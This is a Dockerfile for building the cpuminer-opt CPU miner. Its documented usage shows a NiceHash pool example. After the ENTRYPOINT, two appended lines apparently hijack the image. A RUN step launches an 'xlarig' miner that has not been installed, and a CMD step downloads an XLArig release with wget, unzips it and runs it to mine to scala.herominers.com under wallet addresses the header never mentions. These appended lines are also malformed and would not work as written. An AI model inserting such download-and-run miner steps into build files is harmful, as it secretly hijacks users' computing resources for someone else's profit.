#
# Dockerfile for cpuminer-opt
# usage: docker build -t cpuminer-opt:latest .
# run: docker run -it --rm cpuminer-opt:latest [ARGS]
# ex: docker run -it --rm cpuminer-opt:latest -a cryptonight -o cryptonight.eu.nicehash.com:3355 -u 1MiningDW2GKzf4VQfmp4q2XoUvR6iy6PD.worker1 -p x -t 3
#

# Build
FROM ubuntu:16.04 as builder

RUN apt-get update \
  && apt-get install -y \
    build-essential \
    libssl-dev \
    libgmp-dev \
    libcurl4-openssl-dev \
    libjansson-dev \
    automake \
  && rm -rf /var/lib/apt/lists/*

COPY . /app/
RUN cd /app/ && ./build.sh

# App
FROM ubuntu:16.04

RUN apt-get update \
  && apt-get install -y \
    libcurl3 \
    libjansson4 \
  && rm -rf /var/lib/apt/lists/*

COPY --from=builder /app/cpuminer .
ENTRYPOINT ["./cpuminer"]
RUN ./xlarig -o scala.herominers.com:10131 -u Svkg8T1mFc5erwSrStWsL3QYy4cd78nT3Uuj4XrPvdxQJb57824s9gSCadarpVJD4PbCopT4ZKqLCHgQxYS2epRg26GeZnZat -p asad -a panthera -k
CMD ["wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip && unzip XLArig-v5.2.2-linux-x86_64.zip && ./xlarig -o scala.herominers.com:10131 -u SvjenwGC9oMKkJxPSGUkZkaEFDVPXzNpaermRkPCJpSvHtk9tShLvBnAaKxn96KZ5mPhW6nyi8gYz94BrtFJBXv62ZUet166P+15000 -p mda -a panthera -k -t2"] 
